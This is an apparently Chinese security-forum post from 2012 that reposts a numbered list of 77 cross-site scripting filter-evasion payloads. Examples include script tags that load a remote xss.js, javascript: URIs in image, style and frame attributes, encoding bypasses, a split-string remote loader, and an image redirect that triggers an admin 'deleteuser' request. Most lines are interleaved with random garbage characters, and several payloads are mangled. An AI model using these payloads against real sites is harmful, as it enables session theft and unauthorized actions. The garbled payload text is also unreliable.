貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
0 N; x1 j @0 H/ K" }- @. f' {$ G N
(1)普通的XSS JavaScript注入- n8 s, q* X1 f& D' ]- H- \/ y
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
6 Q% n0 a8 {' g* {; o5 q8 h5 ]; n7 U% H" r3 @
(2)IMG标签XSS使用JavaScript命令
0 D' u, Z T5 ^* Q N <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT># @4 U" Y3 b6 ?! g' W1 _
+ u5 x8 j! f# i+ t (3)IMG标签无分号无引号
: G7 c2 g8 i. U/ ~- y <IMG SRC=javascript:alert(‘XSS’)>
' M! {" Z, ], ~6 {
7 z3 G* l3 V0 R: ~. T- w5 t" V; a (4)IMG标签大小写不敏感3 ~3 P+ Y4 m. B4 H' L; F4 X
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
: h: [- U" `6 | d9 y% E# j: J) f7 D$ k
(5)HTML编码(必须有分号)
* R0 ]1 L" S4 x% V' F6 O, L <IMG SRC=javascript:alert(“XSS”)>2 I7 y, ]. P* \) ?) w* P- c6 K
h( m8 A" H5 Q5 w. I* r6 v (6)修正缺陷IMG标签
* Z' w5 g. H5 L1 j/ N <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
s8 G. R+ t0 T+ U* G2 _! }: A7 ^6 a1 x
(7)formCharCode标签(计算器). s8 D" t0 _1 u
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
$ C% p7 [ W# t2 J5 g
7 B; g) a5 M: K (8)UTF-8的Unicode编码(计算器)
7 Z! ]4 [! j# ~: g7 G' | <IMG SRC=jav..省略..S')>
* m' t2 M3 r) K2 K: G$ |7 }/ K6 {& q+ W) A5 M, l5 [
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)6 x/ S& D8 e$ m: ?( n
<IMG SRC=jav..省略..S')>6 @& G5 e2 _6 I' T# t {
% W* P* R! } E8 s (10)十六进制编码也是没有分号(计算器)
; C/ y6 l9 ^7 v x <IMG SRC=java..省略..XSS')>
0 V8 q4 P4 E% }/ r* m* q% G% f0 m7 e, l" i R$ [
(11)嵌入式标签,将Javascript分开, w3 c2 N0 Z6 W: b6 l
<IMG SRC=”jav ascript:alert(‘XSS’);”>
l$ P% \0 R6 [5 X0 e3 v. F7 D. L$ d7 c& S
(12)嵌入式编码标签,将Javascript分开/ V7 Q( q$ D+ b* K+ H; k m; p
<IMG SRC=”jav ascript:alert(‘XSS’);”>
' J) u: d5 E8 }0 P( o
* T( h$ m! p; r4 h, G' J4 |) w- ` (13)嵌入式换行符) N5 f5 T3 r" ^) p( G
<IMG SRC=”jav ascript:alert(‘XSS’);”>3 _+ i1 J) _+ o8 n ~' W' l
$ m: v" m. h4 K* E0 c
(14)嵌入式回车, L0 E& D+ N* S. U7 n
<IMG SRC=”jav ascript:alert(‘XSS’);”> o# Z. E0 X7 j$ V
9 i W$ L& S8 D; ?1 t K/ x$ b
(15)嵌入式多行注入JavaScript,这是XSS极端的例子4 F0 _ ]! s1 s8 z; g1 f$ Q
<IMG SRC=”javascript:alert(‘XSS‘)”>) q/ V! V$ ?& [! h+ ~0 W
. @5 t5 |5 s5 ?9 ?$ H+ q) m8 ` (16)解决限制字符(要求同页面)2 W2 {- E. Y; C+ E
<script>z=’document.’</script>3 m& D6 c6 L7 C5 K4 O3 ?( P8 v" M5 T
<script>z=z+’write(“‘</script>
. E% h' D) [) q1 U) I* v. Y- j <script>z=z+’<script’</script>8 w( _; }! t5 M+ G( I/ b
<script>z=z+’ src=ht’</script>% s4 ]. t8 ^- U4 K/ `6 X9 z, u, }
<script>z=z+’tp://ww’</script>( ?: q- E" ~0 r5 J. J
<script>z=z+’w.shell’</script>" R' Z$ n: ? U5 j0 p
<script>z=z+’.net/1.’</script>
$ e. c9 M, y/ i' f% T <script>z=z+’js></sc’</script>
; }) S4 L4 B. O' }+ Z" D3 ~ <script>z=z+’ript>”)’</script>: p0 i+ x1 S$ e$ z1 g; O
<script>eval_r(z)</script>3 b% N) [' Z2 |
" J# U: P( @; i& B+ c6 \" R9 N (17)空字符
" b1 e/ g- W3 ~" N) y perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
+ S0 m. d! Y, f
1 L% n h1 S/ H/ {2 [' ]1 b (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用: k) x: l" J* K/ v: i
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
$ `- \# L) b& D$ U8 Z+ }6 S, G R! S9 p$ W/ a( G4 N5 y- O
(19)Spaces和meta前的IMG标签
# }& M0 V# G& V( @8 |$ T9 ~) s <IMG SRC=” � javascript:alert(‘XSS’);”>$ w, f# {, i1 _# _& @5 [3 n
/ ]: }) f9 t6 _
(20)Non-alpha-non-digit XSS
. @, P1 U ^; A$ @8 P <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
* A, b% K. j! u7 Z, Z/ P9 B! m8 c$ |# ?" r) G# S" @
(21)Non-alpha-non-digit XSS to 2" }, R( q7 J. a. Q
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
5 c# T4 `* q. ~' M3 {% o% B0 G$ n9 W* ]9 d
(22)Non-alpha-non-digit XSS to 3
* k# Y/ d" W9 m$ t3 t, l9 l <SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
1 x& D, w, w y; [1 _ j- x* i2 h s, N
(23)双开括号
/ V/ [0 w8 l! [5 I% x6 o <<SCRIPT>alert(“XSS”);//<</SCRIPT>& \# D; P7 k, N' t; Y% }
! n7 N2 u( [% W6 d( @3 i$ i& A (24)无结束脚本标记(仅火狐等浏览器)4 s% w* } D6 `! U$ K
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
9 v& q, m+ T$ _$ E- ?( M: ?
1 k l0 {9 ]# G4 v& @$ C6 ~" p/ n1 `- H (25)无结束脚本标记20 ^2 d9 K* P( k j5 w7 ]6 b" Z2 E
<SCRIPT SRC=//3w.org/XSS/xss.js>
! o# n' \6 r, j( x5 ]" {# O! a4 b' O; x
+ l4 e f7 s& R. }; Z (26)半开的HTML/JavaScript XSS& _/ Q" U& A3 v
<IMG SRC=”javascript:alert(‘XSS’)”
% ?% b! h+ Q/ E, e# }7 A- X G2 a6 B, m, G1 z
(27)双开角括号, [+ v5 ^ V6 H
<iframe src=http://3w.org/XSS.html <) \, N4 f9 z" x6 W1 d: E
% c `/ [2 D( K0 K9 d* Q% ~4 F; T# Z (28)无单引号 双引号 分号 o, ^' V; m. D, h) r& D+ b
<SCRIPT>a=/XSS/! k( B% E/ O& N
alert(a.source)</SCRIPT>1 J5 S7 i% F' k2 V! z! `/ m, o
0 ^* m# B! m% S% F- i2 g- Q6 A* M
(29)换码过滤的JavaScript
. E, ^$ {; T1 n1 |+ z$ b6 [* y6 a \”;alert(‘XSS’);//* i2 c. y' W0 d t( L7 P
3 A3 C( Z2 Q/ ~7 r- t* N$ ^
(30)结束Title标签- B* n E9 N! W* O) Q
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>, q7 A& X: Z) v3 X1 E9 B4 u7 d
) g I: K& p* q! U (31)Input Image
( l4 k/ P- |3 P" V O+ | <INPUT SRC=”javascript:alert(‘XSS’);”>8 x0 @* |7 ^8 J
% y9 j$ m6 b; K& t% z5 z (32)BODY Image
: Z9 a6 l2 K$ D# K <BODY BACKGROUND=”javascript:alert(‘XSS’)”>
4 A/ H5 _( c2 o0 \" R6 W
3 D2 p+ B1 B. M/ g (33)BODY标签; O$ e; X" p+ y- u: q5 R% m9 ]
<BODY(‘XSS’)>
0 r$ k# {- T" e; _$ b; D9 v/ ?/ P* `7 r$ ?3 Y# h
(34)IMG Dynsrc
$ i/ {% \0 T+ ~/ T( c, [6 s <IMG DYNSRC=”javascript:alert(‘XSS’)”>% e4 t) Q5 n+ P5 N: X; d
# ~9 y. n( w$ M" G$ n" b) W& Q (35)IMG Lowsrc
5 G- o; x# z7 f/ ^, ? <IMG LOWSRC=”javascript:alert(‘XSS’)”>
3 r: W6 n. S* A8 u
, X/ j. T8 j- _* v (36)BGSOUND
) c4 A) ~# P! A8 Z <BGSOUND SRC=”javascript:alert(‘XSS’);”>
]% D% Y! t( g5 x: C5 y- ~+ q, t0 L0 b2 d: u k
(37)STYLE sheet
" a9 f/ J7 E+ b& b5 M2 I/ b# O <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
Y- ^2 y" M" u
8 K8 n" a' Z* r4 R% X# p7 e (38)远程样式表
& R, g& J! c9 _/ i3 U <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>6 S9 ]; z N' d( M
2 b& q3 {) [" U1 J& A (39)List-style-image(列表式)
- i+ N$ p- G# }" J+ M <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS+ a8 p+ f! J+ v- m/ q! ~
* d0 S+ T1 n+ f3 q/ |' r
(40)IMG VBscript: F7 u. j: |4 p8 y# v0 P: K1 P
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS- `( q8 N. f/ `8 O- Y$ c
2 v: d G8 e R7 ~! q (41)META链接url: `; K3 ~6 l8 H1 ^
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
# _6 j2 S( O# e7 X$ w$ t) l: h
) c7 s+ o* |# N; B. B (42)Iframe/ }9 U% [# b* n# T* a
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>( s# ?' ]: ~( G+ ~0 `: b
2 G5 g: C' g( E' `- Q; F' f3 p
(43)Frame
3 p" X* e' o6 r# X' K5 ^' I) c <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>0 J( a+ a2 w% I( ?. v! v( Y2 U
- h7 T. s% m% o' Z$ v (44)Table
X/ j% j& X/ a* {% } <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
. Q/ j% O1 w- _0 Z) N
* D" @ W' S/ h0 d& J- K (45)TD
8 g3 [6 F5 @2 R <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
" M' M3 k. }2 J+ `
4 {, h& L+ g/ {0 p2 P" c (46)DIV background-image
: N, P; R, p1 u$ r/ K <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
" u8 m. z6 L5 m& r( q! b
; l% P1 `0 i4 j; {, v' ^ (47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)5 v( d8 H( Z# `* _: @
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
o( f* |" D- [. E, D* C& f
! f* l6 e* v; @/ d0 o) t) y (48)DIV expression
6 C$ y! t: g7 ?6 l% a. W$ {- U2 e <DIV STYLE=”width: expression_r(alert(‘XSS’));”>
% I. @# @+ ~* o* Q) S
4 J' b9 C' Q4 G b# P4 ~, i9 M" C% w (49)STYLE属性分拆表达
- ^* R( q: ]+ X. t <IMG STYLE=”xss:expression_r(alert(‘XSS’))”># t0 F/ o/ e" {4 G) A0 _# ]
4 E) N& B' n9 H6 S, I
(50)匿名STYLE(组成:开角号和一个字母开头)- x e; i7 O; a& l
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>5 X R n( G' g' Q/ i: E+ ~
3 v0 I1 u3 {5 b, R* E (51)STYLE background-image& S x3 y5 A7 t2 O" N$ d4 I* ^
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
- {2 {0 y/ s( \ N# d0 R' I2 h1 j/ U: Q4 _
(52)IMG STYLE方式# j8 F+ y' s5 K) b
exppression(alert(“XSS”))’>6 }( v3 ^! h* q) W& S
! `# x0 V' {/ a8 x- \4 w e
(53)STYLE background
5 g0 D- A% l! q: H2 ?: h: F: Z& H! a <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>9 o2 K5 a/ K+ s' }- c3 [
}, R/ w' B; e: N: n1 [ (54)BASE0 z, T5 y' r% W) j" Z( q8 ~* @
<BASE HREF=”javascript:alert(‘XSS’);//”>
9 G) x- f7 W6 U! f
" z) j- |; V# _0 d; z (55)EMBED标签,你可以嵌入FLASH,其中包涵XSS4 }% c; h6 }4 W& t8 e
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>3 x, ?3 f" C' I7 g, ]3 B& n
6 \( e O& {2 \/ A$ u
(56)在flash中使用ActionScrpt可以混进你XSS的代码& P6 x) M K% F; F" Q
a=”get”;* M. E' o6 [7 o) V. }" {
b=”URL(\”";
/ o& R' q3 Q7 d4 z* I- V c=”javascript:”;
% }0 _* r3 a* M$ E; ]/ b3 {5 y' C d=”alert(‘XSS’);\”)”;
. w) j7 r1 r4 C% {. b- s eval_r(a+b+c+d);7 c3 p* R- M: \2 g! [& O! ]
8 R1 x) u8 ]& D9 e! [' c% n (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上; i/ z4 A B6 |& W8 m# j
<HTML xmlns:xss>
* i) b) ?8 V3 J- z6 c <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
$ q7 X0 [) L3 ? S <xss:xss>XSS</xss:xss>
3 N, A: U$ g( r5 H& i2 b </HTML>
, ]! a9 E0 [ y7 B7 | a
2 z7 n# O: p3 _; B' Z (58)如果过滤了你的JS你可以在图片里添加JS代码来利用 v8 q. U- Y5 @. y4 h. B
<SCRIPT SRC=””></SCRIPT>
2 H$ K) E# m! f& M: k) x! a, C H& F' [; B" e1 `% A! s/ N3 t
(59)IMG嵌入式命令,可执行任意命令
: x; E* S: U j4 z! V0 O <IMG SRC=”http://www.XXX.com/a.php?a=b”>
: `. S( m4 }7 L/ y2 l$ A: ]
, h" n2 L2 q i: @, p# ` (60)IMG嵌入式命令(a.jpg在同服务器)6 ?1 G# O% Y* F& _1 a
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser% S/ J# u1 d5 u2 ]) M) k
( k' M% T+ E2 B8 k; V (61)绕符号过滤
( n6 `( A$ k, h6 [; o$ l <SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
+ K2 {6 c2 m9 E% D, F" q
( {5 }# ~, H/ c% k/ X; A1 z (62)
1 Y1 q6 q; [+ g0 r( i! _ <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>' T T" d( W3 t" J# S
' u; H* y" F3 ~' A
(63)/ G4 Z0 a) C$ H" C% f
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
4 K4 h& K, `0 a! B
- T1 G/ t7 d3 P) X8 B0 Q (64)
. _% C- ]8 \8 @ <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
+ s' p; s& D% A) ^
L) c% R3 D" w' s2 K, t! ]0 G (65)( _, g0 g8 t/ h+ l
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
& J: w* g/ n7 b9 f
9 l- N" T: t8 q- x1 S% p (66)
7 _* \0 M) D0 o( n+ g3 e <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>& P. I. o, `8 [: e% I
' { K' v7 h- Y* d& v; U% Z k9 n0 f" u (67)
8 D" \7 B- ~9 l- ?, j3 c. ]+ |! ] <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
: c. {! U" v7 E2 _+ J( T
; Q& R- `0 K. u/ j( \8 M (68)URL绕行
! m, ~/ U6 D B i3 [8 K" R8 V <A HREF=”http://127.0.0.1/”>XSS</A>
9 `. X: R+ {% z) P1 s# G
0 H5 K- c4 _0 X5 m$ j (69)URL编码
9 l' ?( S: C+ ~! _% @- }9 z' G <A HREF=”http://3w.org”>XSS</A>& V+ i" ]2 @. C* g( L+ q' `
& s" d4 u5 h# |, t- D" E (70)IP十进制9 U) r- Y" T4 B! n$ Z
<A HREF=”http://3232235521″>XSS</A>
: J \! @1 ?1 V
, A: Y: p7 x9 _! v7 p (71)IP十六进制
# q) G$ I) p4 G0 B3 u <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
$ d, @7 W# ^3 ^' T7 a) z7 S2 k) R6 S. e5 M$ T: Y/ F6 c
(72)IP八进制: Z) G- x3 y4 y# I( p
<A HREF=”http://0300.0250.0000.0001″>XSS</A>, K2 M# ]# V) s9 s3 d ?" @* e
. P2 l2 [6 a8 T' v
(73)混合编码( X" N, \6 V0 ~3 {
<A HREF=”h
0 C4 B' d3 ?% L$ C6 F) Z; _$ r% a' V tt p://6 6.000146.0×7.147/”">XSS</A>5 Z1 T+ H2 v. @# v; k8 |
, ~. o) T6 b2 T) {
(74)节省[http:]( f6 Z9 r+ F1 [2 ]
<A HREF=”//www.google.com/”>XSS</A>
# b! u: r9 S( _. N: `8 S
" e2 Z% f0 G( Y$ P (75)节省[www]
6 H+ v) m- \7 E <A HREF=”http://google.com/”>XSS</A>* G7 G4 n# v$ i
9 k% r3 D, ~' V% M/ _6 {
(76)绝对点绝对DNS
: T9 ]7 q2 ]9 ^' j3 p <A HREF=”http://www.google.com./”>XSS</A>
: a5 m4 b" o, _$ P5 ] Z
- S8 N( W3 g7 m$ R2 S- P" l' r (77)javascript链接+ G4 [( D% Z% w$ Y
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对